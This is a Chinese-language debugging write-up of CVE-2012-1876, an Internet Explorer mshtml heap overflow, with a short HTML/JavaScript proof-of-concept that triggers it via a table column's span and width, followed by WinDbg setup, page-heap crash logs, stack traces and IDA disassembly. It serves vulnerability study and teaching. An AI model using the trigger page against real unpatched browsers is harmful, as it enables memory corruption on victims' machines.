CVE-2012-1876调试笔记

前言

在调试漏洞战争上的CVE-2012-1876做了一些笔记,漏洞分析的话漏洞战争和vupen的文章已经写的很清楚了。
因为是第一次用windbg,所以我主要把自己的环境搭建(比如怎么导入符号文件)和调试日志(十分详细)记录了一下,希望对那些和我一样,刚开始学习漏洞分析与调试的人有所帮助。

参考资料

调试环境搭建

下载

windbg符号文件设置

在windbg的窗口里输入

1
.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

重启后要重新输入。

poc调试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" >&nbsp </col>
</table>
<script>

function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}

setTimeout("over_trigger();",1);

</script>
</body>
</html>

基于HPA的漏洞分析方法

  • hpa:启动页堆,在堆块后增加专门用于检测溢出的栅栏页,若发生堆溢出触及栅栏页便会立刻触发异常。

在终端通过gflags启动hpa

启动ie浏览器后,用windbg attach进程


两个进程,一个是broker进程 一个是页面的内容进程,附加后面的那个就可以,就是内容进程。
检查一下hpa开了没。

1
2
3
4
5
6
7
8
0:000> .symfix
0:000> .reload
Reloading current modules
................................................................
.............................
0:000> !gflag
Current NtGlobalFlag contents: 0x02000000
hpa - Place heap allocations at ends of pages

然后需要开启子进程调试,这样才能断下来。

1
.childdbg 1

然后g,启动调试器。

1
2
3
4
5
6
7
8
9
10
0:027> g
ModLoad: 74c30000 74c38000 C:\Windows\system32\credssp.dll
ModLoad: 752a0000 752a8000 C:\Windows\system32\secur32.dll
ModLoad: 750c0000 750f8000 C:\Windows\system32\ncrypt.dll
ModLoad: 750a0000 750b7000 C:\Windows\system32\bcrypt.dll
ModLoad: 74c70000 74cad000 C:\Windows\system32\bcryptprimitives.dll
ModLoad: 74b50000 74b66000 C:\Windows\system32\GPAPI.dll
ModLoad: 70c60000 70c7c000 C:\Windows\system32\cryptnet.dll
ModLoad: 72e70000 72e85000 C:\Windows\system32\Cabinet.dll
ModLoad: 74d10000 74d1e000 C:\Windows\system32\DEVRTL.dll


看到debugger正在运行了。
然后把poc拖到浏览器里运行。
另外poc拖进去之后,会自动断下来。

再g一下,就变成下面这个样子。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
1:021> g
ModLoad: 760f0000 7610f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75b40000 75c0c000 C:\Windows\system32\MSCTF.dll
ModLoad: 6ccf0000 6d76c000 C:\Windows\system32\IEFRAME.dll
ModLoad: 75da0000 75da5000 C:\Windows\system32\PSAPI.DLL
ModLoad: 72940000 7297c000 C:\Windows\system32\OLEACC.dll
ModLoad: 741a0000 7433e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\comctl32.dll
ModLoad: 75810000 7588b000 C:\Windows\system32\comdlg32.dll
ModLoad: 71620000 71655000 C:\Program Files\Internet Explorer\IEShims.dll
ModLoad: 75460000 7546c000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74390000 743d0000 C:\Windows\system32\uxtheme.dll
ModLoad: 75500000 7550e000 C:\Windows\system32\RpcRtRemote.dll
ModLoad: 735b0000 735c3000 C:\Windows\system32\dwmapi.dll
ModLoad: 723c0000 723f3000 C:\Program Files\Internet Explorer\sqmapi.dll
ModLoad: 74f90000 74fa6000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 76170000 7630d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 756b0000 756d7000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 756e0000 756f2000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 74d30000 74d6b000 C:\Windows\system32\rsaenh.dll
ModLoad: 764a0000 76523000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 743f0000 744e5000 C:\Windows\system32\propsys.dll
ModLoad: 6f9e0000 6fa0b000 C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 772c0000 773b4000 C:\Windows\system32\WININET.dll
ModLoad: 76490000 76493000 C:\Windows\system32\Normaliz.dll
ModLoad: 75510000 7551b000 C:\Windows\system32\profapi.dll
ModLoad: 753f0000 7540a000 C:\Windows\system32\SspiCli.dll
ModLoad: 75db0000 75de5000 C:\Windows\system32\ws2_32.DLL
ModLoad: 759f0000 759f6000 C:\Windows\system32\NSI.dll
ModLoad: 74e10000 74e54000 C:\Windows\system32\dnsapi.DLL
ModLoad: 739a0000 739bc000 C:\Windows\system32\iphlpapi.DLL
ModLoad: 73980000 73987000 C:\Windows\system32\WINNSI.DLL
ModLoad: 6d920000 6d94e000 C:\Windows\system32\MLANG.dll
ModLoad: 75410000 7545b000 C:\Windows\system32\apphelp.dll
ModLoad: 73fe0000 74001000 C:\Windows\system32\ntmarta.dll
ModLoad: 77500000 77545000 C:\Windows\system32\WLDAP32.dll
ModLoad: 74a10000 74a19000 C:\Windows\system32\VERSION.dll
ModLoad: 67b10000 680c2000 C:\Windows\System32\mshtml.dll
ModLoad: 6e2c0000 6e2ea000 C:\Windows\System32\msls31.dll
ModLoad: 75470000 754cf000 C:\Windows\system32\SXS.DLL
ModLoad: 71270000 712a2000 C:\Windows\system32\WINMM.dll
ModLoad: 744f0000 74529000 C:\Windows\system32\MMDevAPI.DLL
ModLoad: 6daf0000 6db20000 C:\Windows\system32\wdmaud.drv
ModLoad: 6dae0000 6dae4000 C:\Windows\system32\ksuser.dll
ModLoad: 74730000 74737000 C:\Windows\system32\AVRT.dll
ModLoad: 6db20000 6db56000 C:\Windows\system32\AUDIOSES.DLL
ModLoad: 74760000 7476b000 C:\Windows\system32\msimtf.dll
ModLoad: 6dad0000 6dad8000 C:\Windows\system32\msacm32.drv
ModLoad: 6dab0000 6dac4000 C:\Windows\system32\MSACM32.dll
ModLoad: 6daa0000 6daa7000 C:\Windows\system32\midimap.dll


然后允许ActiveX控件运行。

1
2
3
4
5
6
7
8
(4b8.c00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=06caf000 edi=06caf018
eip=67f3f167 esp=0452daa8 ebp=0452dab4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CTableColCalc::AdjustForCol+0x15:
67f3f167 890f mov dword ptr [edi],ecx ds:0023:06caf018=????????

然后kb回溯一下栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
1:025> kb
ChildEBP RetAddr Args to Child
0452dab4 67db5b8e 00414114 0452ddf8 00000001 mshtml!CTableColCalc::AdjustForCol+0x15
0452db64 67c20713 00000001 0452ddf8 000003e8 mshtml!CTableLayout::CalculateMinMax+0x52f
0452dd80 67c0af19 0452ddf8 0452ddc4 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0452df2c 67cfcc48 0452f5a0 0452e158 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0452e064 67cef5d0 06e19ea8 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
0452e128 67cef31d 06e19ea8 0001769c 0001769c mshtml!CFlowLayout::MeasureSite+0x312
0452e170 67cef664 0779bf00 00000061 0452f5a0 mshtml!CFlowLayout::GetSiteWidth+0x156
0452e1b0 67cefb40 07bfafb0 06e19ea8 00000001 mshtml!CLSMeasurer::GetSiteWidth+0xce
0452e234 6e2c665d 07862ff8 0452e254 0452e318 mshtml!CEmbeddedILSObj::Fmt+0x150
0452e2c4 6e2c6399 07c12efc 00000000 07025d20 msls31!ProcessOneRun+0x3e9
0452e320 6e2c6252 07c12f18 00018258 00000000 msls31!FetchAppendEscCore+0x18e
0452e374 6e2c61c3 00000000 00000000 00000014 msls31!LsDestroyLine+0x47f
0452e3fc 6e2c293f 00000007 00003832 00000000 msls31!LsDestroyLine+0x9ff
0452e438 67cedd81 00000001 00000007 00003832 msls31!LsCreateLine+0xcb
0452e588 67d017cc 0452f5a0 00000007 07bfafc0 mshtml!CLSMeasurer::LSDoCreateLine+0x127
0452e62c 67d01ef5 0452ee90 0001769c 00000000 mshtml!CLSMeasurer::LSMeasure+0x34
0452e674 67d01db1 00000000 00017e6c 00000083 mshtml!CLSMeasurer::Measure+0x1e6
0452e698 67d011a2 00017e6c 00000083 0779bf40 mshtml!CLSMeasurer::MeasureLine+0x1c
0452e748 67d2a8f6 0452ec68 07470fd8 00000083 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0452ef50 67d2b304 0452f5a0 00000007 0000000e mshtml!CDisplay::RecalcLines+0x8bb
0452f0a0 67d28c5c 0452f5a0 00000007 0000000e mshtml!CDisplay::UpdateView+0x208
0452f154 67d29ee3 0452f5a0 0452f6d8 0873cf10 mshtml!CFlowLayout::CommitChanges+0x9c
0452f264 67c0eb06 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcTextSize+0x30f
0452f4ec 67d002ee 0779bf00 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCoreCompat+0x1045
0452f508 67d00367 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCore+0x49
0452f544 67d0029c 0452f5a0 0452f6d8 00000000 mshtml!CBodyLayout::CalcSizeCore+0xd8
0452f57c 67cfcc48 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeVirtual+0x1af
0452f6b4 67c84121 0779bf00 00000001 00000000 mshtml!CLayout::CalcSize+0x2b8
0452f7a4 67d290f9 00100000 00000007 059ebeb4 mshtml!CFlowLayout::DoLayout+0x543
0452f7e0 67cec8ca 059eb870 00100000 0452f840 mshtml!CView::ExecuteLayoutTasks+0x3b
0452f824 67d2336d 00000000 0452f870 0000008d mshtml!CView::EnsureView+0x355
0452f848 67ce94b2 059eb870 00000000 06d24d58 mshtml!CView::EnsureViewCallback+0xd3
0452f87c 67cd37f7 0452f918 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0452f89c 75ce86ef 000f0402 00000012 00000000 mshtml!GlobalWndProc+0x10c
0452f8c8 75ce8876 67cc1de3 000f0402 00008002 USER32!InternalCallWinProc+0x23
0452f940 75ce89b5 00000000 67cc1de3 000f0402 USER32!UserCallWinProcCheckWow+0x14b
0452f9a0 75ce8e9c 67cc1de3 00000000 0452fa28 USER32!DispatchMessageWorker+0x35e
0452f9b0 6cde04a6 0452f9c8 00000000 00752f58 USER32!DispatchMessageW+0xf
0452fa28 6cdf0446 05688808 00000000 006ccff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452
0452fae0 75f549bd 00752f58 00000000 0452fafc IEFRAME!LCIETab_ThreadProc+0x2c1
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
0452faf0 76361174 006ccff0 0452fb3c 7741b3f5 iertutil!CIsoScope::RegisterThread+0xab
WARNING: Stack unwind information not available. Following frames may be wrong.
0452fafc 7741b3f5 006ccff0 73d26994 00000000 kernel32!BaseThreadInitThunk+0x12
0452fb3c 7741b3c8 75f549af 006ccff0 00000000 ntdll!__RtlUserThreadStart+0x70
0452fb54 00000000 75f549af 006ccff0 00000000 ntdll!_RtlUserThreadStart+0x1b

这里可能会出现没有符号的问题,解决方法如下:
在windbg的窗口里输入

1
.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

然后可以看见

分析一下
首先导致崩溃的(分析内容在下述代码注释了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
1:025> uf mshtml!CTableColCalc::AdjustForCol
mshtml!CTableColCalc::AdjustForCol:
67f3f152 8bff mov edi,edi
67f3f154 55 push ebp
67f3f155 8bec mov ebp,esp
67f3f157 8b08 mov ecx,dword ptr [eax]
67f3f159 53 push ebx
67f3f15a 8b5d08 mov ebx,dword ptr [ebp+8]
67f3f15d 57 push edi
67f3f15e 8bc1 mov eax,ecx
67f3f160 83e00f and eax,0Fh
67f3f163 8d7e18 lea edi,[esi+18h];可以看到edi来源于esi,但是esi的处理代码并不在这个函数里,所以继续向上回溯。
67f3f166 50 push eax
67f3f167 890f mov dword ptr [edi],ecx;向edi指向的内存里拷贝值导致crash
67f3f169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (67cf9e0c)
67f3f16e 85c0 test eax,eax
67f3f170 7411 je mshtml!CTableColCalc::AdjustForCol+0x31 (67f3f183)

...

这样就清楚了,我们要在上一个函数下断。
重启一下windbg,重新attach

1
2
3
4
5
6
0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> lmm mshtml
start end module name
0:021> sxe ld:mshtml
0:021> g

这个时候把poc拖进去(注意到没有提示允许activeX运行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
Page heap: pid 0xDC4: page heap enabled with flags 0x3.
(dc4.e34): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0016f5d8 edx=774064f4 esi=fffffffe edi=00000000
eip=7745e60e esp=0016f5f4 ebp=0016f620 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
7745e60e cc int 3
1:014> g
ModLoad: 691c0000 69772000 C:\Windows\System32\mshtml.dll
eax=07237000 ebx=00000000 ecx=00171000 edx=00000000 esi=7ffda000 edi=0467b384
eip=774064f4 esp=0467b29c ebp=0467b2f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
774064f4 c3 ret

1:025> lm m mshtml
start end module name
691c0000 69772000 mshtml (deferred)
  • lm (List Loaded Modules)
    lm命令显示指定的已加载模块。输出中包含模块状态和路径。

    • m Pattern
      指定模块名必须匹配的模板。Pattern可以包含各种通配符和修饰符。关于语法的更多信息,查看字符串通配符语法。
  • sx 命令显示当前进程的异常列表和所有非异常的事件列表,并且显示调试器遇到每个异常和事件时的行为。

    • sxe Break
      当发生该异常时,在任何错误处理器被激活之前目标立即中断到调试器中。这种处理类型称为第一次处理机会。
  • ld (Load Symbols)
    ld 命令加载指定模块的符号并刷新所有模块信息。

这样组合起来,就是ld制定mshtml加载,然后sxe强制在加载这个模块后断下。
现在我们就可以对这个函数下断了。

1
2
3
4
5
6
7
8
9
10
11
12
1:025> bp mshtml!CTableLayout::CalculateMinMax
1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax
1:025> g
(c84.798): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
  • bp, bu, bm (Set Breakpoint)
    bp、bu和bm命令设置一个或多个软断点(software breakpoints)。可以组合位置、条件和选项来设置各种不同类型的软断点。
  • bl (Breakpoint List)
    bl 命令列出已存在的断点的信息。
  • g 命令开始指定进程或线程的执行。这种执行将会在程序结束、遇到BreakAddress 或者其他造成调试器停止的事件发生时停止。

我在调试的时候辅助了一下IDA,其实是可以不用的。
直接静态分析找到CalculateMinMax

另外这里也需要导入符号。


单步继续跟随调试,按p就可以单步执行( 不进入函数那种),不过其实按回车也可以。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1:025>
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018c esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x2:
692d018c 55 push ebp
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018d esp=0467e4ac ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3:
692d018d 8bec mov ebp,esp
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018f esp=0467e4ac ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x5:
692d018f 81ec90000000 sub esp,90h
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0195 esp=0467e41c ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xb:
692d0195 53 push ebx
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0196 esp=0467e418 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xc:
692d0196 8b5d08 mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8

注意到mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8,[ebp+8]是参数1(知道栈吧..)

1
2
3
4
5
6
7
8
9
1:025> dd poi(ebp+8)
0492aea8->poi(ebp+8) 691c9868 06216f30 071d8fb8 69384918
0492aeb8 00000001 00000000 0108080d ffffffff
0492aec8 00000000 00000000 00000000 ffffffff
0492aed8 0001769c 0000a7f8 00000000 00000000
0492aee8 00000000 00412802 00000000 00000000
0492aef8 00000000 00000001 ffffffff ffffffff
0492af08 ffffffff ffffffff 691c9fd0 00000004
0492af18 00000004 0497eff0 691c9fd0 00000004
  • dd 双字值(4字节)
    默认的显示数量为32个DWORD(128字节)。
  • poi()
    指定地址处的指针大小的数据。指针大小或者是 32 位或者是 64 位。在内核调试模式,大小基于目标计算机上的处理器。在 Intel Itanium 计算机上用户模式调试下,大小或者是 32 位或者是 64 位,依赖于目标应用程序。所以,如果你想得到指针大小的数据最好使用 poi 运算符。
1
2
3
4
5
6
7
8
9
10
11
12
13
1:025> dd poi(ebp+8)
0492aea8 691c9868 06216f30 071d8fb8 69384918
0492aeb8 00000001 00000000 0108080d ffffffff
0492aec8 00000000 00000000 00000000 ffffffff
0492aed8 0001769c 0000a7f8 00000000 00000000
0492aee8 00000000 00412802 00000000 00000000
0492aef8 00000000 00000001 ffffffff ffffffff
0492af08 ffffffff ffffffff 691c9fd0 00000004
0492af18 00000004 0497eff0 691c9fd0 00000004
1:025> ln 691c9868
(691c9868) mshtml!CTableLayout::`vftable' | (691c99a8) mshtml!CTableLayoutBlock::`vftable'
Exact matches:
mshtml!CTableLayout::`vftable' = <no type information>
  • ln 命令显示给定地址处的或者最近的符号。

可见参数1引用的是CTableLayout对象,也就是<table>标签中的对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0199 esp=0467e418 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xf:
692d0199 56 push esi
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d019a esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x10:
692d019a 8b750c mov esi,dword ptr [ebp+0Ch] ss:0023:0467e4b8=0467e740
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d019d esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x13:
692d019d 8b4628 mov eax,dword ptr [esi+28h] ds:0023:0467e768=00000000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a0 esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x16:
692d01a0 898574ffffff mov dword ptr [ebp-8Ch],eax ss:0023:0467e420=00171000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a6 esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1c:
692d01a6 8b4354 mov eax,dword ptr [ebx+54h] ds:0023:0492aefc=00000001

这里的ebx+54h指向的是table标签里的col元素的span值,在poc中只有一个span值1,所以这里赋值1.

讲道理,用windbg这样看汇编太难受了,接下来我们用IDA看吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
.text:74D3018A
.text:74D3018A mov edi, edi
.text:74D3018C push ebp
.text:74D3018D mov ebp, esp
.text:74D3018F sub esp, 90h
.text:74D30195 push ebx ; struct tagSIZE *
.text:74D30196 mov ebx, [ebp+arg_0];-> 参数1引用的是CTableLayout对象,也就是table标签在内存的对象。
.text:74D30199 push esi ; struct CTableCalcInfo *
.text:74D3019A mov esi, [ebp+arg_4]
.text:74D3019D mov eax, [esi+28h]
.text:74D301A0 mov [ebp+var_8C], eax
.text:74D301A6 mov eax, [ebx+54h]; -> span属性值的和,我们将其标记为spansum
.text:74D301A9 mov [ebp+arg_0], eax; -> arg_0=spansum
.text:74D301AC mov eax, [ebx+128h]
.text:74D301B2 shr eax, 2
...
...
...
.text:74D30293 loc_74D30293: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105j
.text:74D30293 mov edx, [ebp+arg_0];-> edx=arg_0=spansum
.text:74D30296 mov eax, edx
.text:74D30298 sub eax, ecx
.text:74D3029A mov [ebp+var_1C], eax
.text:74D3029D push 0
.text:74D3029F pop eax
.text:74D302A0 setz al
.text:74D302A3 mov [ebx+50h], ecx
.text:74D302A6 shl eax, 8
.text:74D302A9 xor eax, [ebx+44h]
.text:74D302AC and eax, 100h
.text:74D302B1 xor [ebx+44h], eax
.text:74D302B4 test byte ptr [esi+2Ch], 1
.text:74D302B8 jnz loc_74C5EE4D
.text:74D302BE
.text:74D302BE loc_74D302BE: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133Bj
.text:74D302BE xor eax, eax
.text:74D302C0
.text:74D302C0 loc_74D302C0: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9j
.text:74D302C0 or [ebp+var_38], eax
.text:74D302C3 cmp [ebp+arg_8], edi
.text:74D302C6 jnz loc_74EC5948
.text:74D302CC mov eax, [ebx+94h];->CTableLayout+0x94,用于和spansum作比较,此处标记为spancmp
.text:74D302D2 shr eax, 2;-> spancmp>>2即spancmp/4
.text:74D302D5 cmp eax, edx;若spancmp >= spansum,则跳转,这里是0<1,所以不跳转。
.text:74D302D7 jge short loc_74D30312
.text:74D302D9 cmp edx, edi
.text:74D302DB lea esi, [ebx+90h]
.text:74D302E1 jl loc_74C2CE82
.text:74D302E7 cmp edx, [esi+8]
.text:74D302EA jbe short loc_74D302FF
.text:74D302EC push 1Ch ; unsigned int
.text:74D302EE mov eax, edx
.text:74D302F0 mov edi, esi
.text:74D302F2 call ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)

跟进CImplAry::EnsureSizeWorker函数,发现该函数主要用于分配堆内存,分配的内存大小,分配的内存大小为spansum * 0x1C,虽然此处spansum为1,但其分配的最小值为0x1C * 4=0x70,分配的地址保存在CtableLayout+0x9C

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
.text:74DF8F9C ; public: long __thiscall CDataAry<long>::EnsureSize(long)
.text:74DF8F9C ?EnsureSize@?$CDataAry@J@@QAEJJ@Z proc near
.text:74DF8F9C ; CODE XREF: CTimerCtx::CTimerCtx(CTimerMan *,_RTL_CRITICAL_SECTION *)+ACp
.text:74DF8F9C ; CDocument::EnumObjects(ulong,IEnumUnknown * *)+6Bp ...
.text:74DF8F9C
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74DF9013 SIZE 00000009 BYTES
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74EBD728 SIZE 00000007 BYTES
.text:74DF8F9C
.text:74DF8F9C mov edi, edi
.text:74DF8F9E push edi ; __int32
.text:74DF8F9F mov edi, ecx
.text:74DF8FA1 test eax, eax
.text:74DF8FA3 jl loc_74EBD728
.text:74DF8FA9 cmp eax, [edi+8]
.text:74DF8FAC ja short loc_74DF9013
.text:74DF8FAE xor eax, eax
.text:74DF8FB0 pop edi
.text:74DF8FB1 retn
.text:74DF8FB1 ?EnsureSize@?$CDataAry@J@@QAEJJ@Z endp
.text:74DF8FB1
.text:74DF8FB1 ; ---------------------------------------------------------------------------
.text:74DF8FB2 db 5 dup(90h)
.text:74DF8FB7
.text:74DF8FB7 ; =============== S U B R O U T I N E =======================================
.text:74DF8FB7
.text:74DF8FB7 ; Attributes: bp-based frame
.text:74DF8FB7
.text:74DF8FB7 ; __int32 __thiscall CImplAry::EnsureSizeWorker(CImplAry *__hidden this, unsigned int, __int32)
.text:74DF8FB7 ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z proc near
.text:74DF8FB7 ; CODE XREF: CSelectionRenderingServiceProvider::GetSelectionChunksForLayout(CFlowLayout *,CRenderInfo *,CDataAry<HighlightSegment> *,int *,int *)-6B92p
.text:74DF8FB7 ; CView::DeferTransition(COleSite *)+3Fp ...
.text:74DF8FB7
.text:74DF8FB7 dwBytes = dword ptr -8
.text:74DF8FB7 var_4 = dword ptr -4
.text:74DF8FB7 Size = dword ptr 8
.text:74DF8FB7
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E02CB4 SIZE 00000036 BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E3BEEC SIZE 0000003D BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74EBD6E7 SIZE 0000000D BYTES
.text:74DF8FB7
.text:74DF8FB7 mov edi, edi
.text:74DF8FB9 push ebp
.text:74DF8FBA mov ebp, esp
.text:74DF8FBC push ecx
.text:74DF8FBD push ecx
.text:74DF8FBE push ebx
.text:74DF8FBF push esi
.text:74DF8FC0 mov esi, eax
.text:74DF8FC2 push 4
.text:74DF8FC4 pop eax
.text:74DF8FC5 mov [ebp+var_4], eax
.text:74DF8FC8 cmp esi, eax
.text:74DF8FCA jnb loc_74E02CB4
.text:74DF8FD0
.text:74DF8FD0 loc_74DF8FD0:
.text:74DF8FD0 ; CImplAry::EnsureSizeWorker(uint,long)+9D25j ...
.text:74DF8FD0 mov eax, [ebp+var_4]; -> eax=4
.text:74DF8FD3 mul [ebp+Size]; ->分配spansum*0x1C大小的内存,至少是0x1C*4=0x70
.text:74DF8FD6 push edx
.text:74DF8FD7 push eax;-> size参数
.text:74DF8FD8 lea eax, [ebp+dwBytes]
.text:74DF8FDB call ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
.text:74DF8FE0 mov ebx, eax
.text:74DF8FE2 test ebx, ebx
.text:74DF8FE4 jnz short loc_74DF900B
.text:74DF8FE6 test byte ptr [edi+4], 2
.text:74DF8FEA jnz loc_74E3BEEC
.text:74DF8FF0 push [ebp+dwBytes] ;->spansum*0x1c=0x1c
.text:74DF8FF3 lea esi, [edi+0Ch]
